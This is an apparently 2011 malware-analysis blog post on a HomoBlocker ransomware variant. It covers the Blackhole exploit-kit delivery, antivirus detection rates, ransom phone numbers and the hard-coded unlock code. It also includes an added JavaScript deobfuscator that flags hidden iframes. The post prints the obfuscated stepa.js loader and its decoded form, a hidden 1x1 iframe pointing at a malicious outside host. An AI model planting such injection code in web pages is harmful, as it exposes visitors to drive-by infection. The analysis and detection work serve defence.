Friday, 8 April 2011

Trojan.Ransom (HomoBlocker)



The resurrection of HomoBlocker after about two months of inactivity.
NB: A WinAD server was shut down yesterday; the 'IRON MAIDEN' version was really interesting, you should read that.

What's new in this version?
- Protected with Mystic Compressor (like its cousin)
- Uses junk code (NOPs) in the serial verification.
- Malicious website updated (click here to view the old stuff).


The porn image in the background, which represents a fake video player, has changed (before, it was not this girl).

The author himself says so in the name of the pic:

The page title and the malware directory have changed; otherwise the code is almost the same: an image that leads to the malware download,
and a .JS file that tries to exploit vulnerabilities in your browser to make you download and execute the file automatically, without your permission.

stepa.js:
var _0x63a3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x69\x32\x72\x74\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6F\x72\x75\x6D\x2E\x70\x68\x70\x3F\x74\x70\x3D\x65\x64\x31\x62\x63\x35\x35\x37\x30\x39\x33\x65\x37\x35\x65\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x63a3[2]](_0x63a3[1])[_0x63a3[0]]=_0x63a3[3];

Deobfuscated:
document['getElementById']('clear_block')['innerHTML'] = '<iframe src="http://i2rt.co.cc/forum.php?tp=ed1bc557093e75e0" width="1" height="1" scrolling="no" frameborder="0"></iframe>';
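As an added example (not code from the blog post), here is a small JavaScript deobfuscator for this string-array pattern: it pulls the `_0x…` table out of the script, decodes the \xNN escapes, substitutes each `NAME[N]` lookup with the literal it resolves to, and then flags any 1x1 iframe in the decoded strings, which is the indicator a defender would alert on. The input is the stepa.js text quoted above; the function names and the `1px or less` threshold are my own choices.

```javascript
// Added example, not code from the blog post: decode the hex-escaped
// string-array obfuscation used by stepa.js and flag hidden iframes.
// STEPA_JS is the script text quoted in the post, kept verbatim via String.raw
// so the \xNN escapes survive as text. Function names are my own.
const STEPA_JS = String.raw`var _0x63a3=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x65\x61\x72\x5F\x62\x6C\x6F\x63\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x69\x32\x72\x74\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6F\x72\x75\x6D\x2E\x70\x68\x70\x3F\x74\x70\x3D\x65\x64\x31\x62\x63\x35\x35\x37\x30\x39\x33\x65\x37\x35\x65\x30\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];document[_0x63a3[2]](_0x63a3[1])[_0x63a3[0]]=_0x63a3[3];`;

// Turn the escape sequences inside a double-quoted JS string literal into characters.
function decodeEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\(.)/g, (_, x, u, c) => {
    if (x !== undefined) return String.fromCharCode(parseInt(x, 16));
    if (u !== undefined) return String.fromCharCode(parseInt(u, 16));
    const simple = { n: '\n', r: '\r', t: '\t', '0': '\0' };
    return c in simple ? simple[c] : c; // \" \\ \' map to themselves
  });
}

// Locate the `var NAME=["...","..."];` table and decode every entry.
// Returns the table name, the decoded entries and where the declaration ends.
function extractStringArray(src) {
  const head = /var\s+(\w+)\s*=\s*\[/.exec(src);
  if (!head) throw new Error('no string array found');
  const name = head[1];
  const items = [];
  // Sticky regex: one string literal plus the separator that follows it.
  const tok = /\s*"((?:[^"\\]|\\.)*)"\s*(,|\])/y;
  tok.lastIndex = head.index + head[0].length;
  let t;
  while ((t = tok.exec(src)) !== null) {
    items.push(decodeEscapes(t[1]));
    if (t[2] === ']') break;
  }
  if (!t) throw new Error('unterminated string array');
  const semi = src.indexOf(';', tok.lastIndex);
  const declEnd = semi === -1 ? tok.lastIndex : semi + 1;
  return { name, items, declEnd };
}

// Emit a single-quoted JS literal, escaping backslashes and quotes.
function quote(s) {
  return "'" + s.replace(/\\/g, '\\\\').replace(/'/g, "\\'") + "'";
}

// Strip the table declaration and inline every NAME[N] reference.
function deobfuscate(src) {
  const { name, items, declEnd } = extractStringArray(src);
  const body = src.slice(declEnd).trimStart();
  const escaped = name.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const ref = new RegExp(escaped + '\\[(\\d+)\\]', 'g');
  const code = body.replace(ref, (whole, idx) => {
    const i = Number(idx);
    return i < items.length ? quote(items[i]) : whole; // leave out-of-range lookups untouched
  });
  return { items, code };
}

// Report iframes whose width or height is 1px or less: a hidden frame
// pointing at another host is the exploit-kit loader pattern seen here.
function findHiddenIframes(strings) {
  const found = [];
  for (const s of strings) {
    const tagRe = /<iframe\b([^>]*)>/gi;
    let m;
    while ((m = tagRe.exec(s)) !== null) {
      const attrs = {};
      for (const a of m[1].matchAll(/(\w+)\s*=\s*"([^"]*)"/g)) attrs[a[1].toLowerCase()] = a[2];
      const w = Number(attrs.width), h = Number(attrs.height);
      if ((attrs.width !== undefined && w <= 1) || (attrs.height !== undefined && h <= 1)) {
        found.push({ src: attrs.src || '', width: w, height: h });
      }
    }
  }
  return found;
}

const result = deobfuscate(STEPA_JS);
console.log(result.code);
console.log(findHiddenIframes(result.items));
```

Run it with `node` and the first line printed is the same statement as the hand-deobfuscated one above; the second is the list of hidden frames with their `src`, which is what you would feed into a blocklist or a proxy alert. The sticky regex walks the array one literal at a time, so entries that happen to contain `]` or `,` once decoded do not break the parse.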



Those who are familiar with exploit kits will recognize it: Blackhole Exploit Kit.
In the past, they used PEK.

Dropper: 5/41 (12.2%)
Payload: 5/42 (11.9%)
----------
This trojan blocker (MD5: 1b0f32ae76450a82ec8949604f4b8a79) prevents all software execution.
To remove the trojan (and unlock Windows), infected users need to enter a valid serial number.



Number to Call: 9652537359
Number to Call: 9670955653
Number to Call: 9099417960
Number to Call: 9652537545
Number to Call: 9670929482
Code to unlock Windows: THE TROOPER

1) Compare (CMP) whether you have pressed [ENTER] on your keyboard.

2) Get your entered serial.

3) Assemble the string 'THE TROOPER' in a buffer.

4) Get your entered text (here: XYL2K), then it gets the assembled string (THE TROOPER).

5) Compare your serial with 'THE TROOPER'.

----------
HomoBlocker is a variant of Pornoplayer.
HomoBlocker was already analyzed in the past: here (15 Jan 2011) ~ here (16 Jan 2011) ~ here (18 Jan 2011) ~ here (20 Jan 2011) ~ here (25 Jan 2011) ~ here (30 Jan 2011) ~ here (7 Feb 2011)

2 comments:

  1. HomoBlocker huh? Looks interesting, and distracting. How do you stay focused while reversing stuff like this? :)

  2. HomoBlocker is a name given by Kaspersky Lab, Ikarus and more.. I just reuse the detection name (Trojan-Ransom.Win32.HomoBlocker)

    To stay focused you need to break on it when it checks the serial; that way the ransomware is frozen and Olly appears. Sometimes that doesn't work, so.. SoftICE :þ
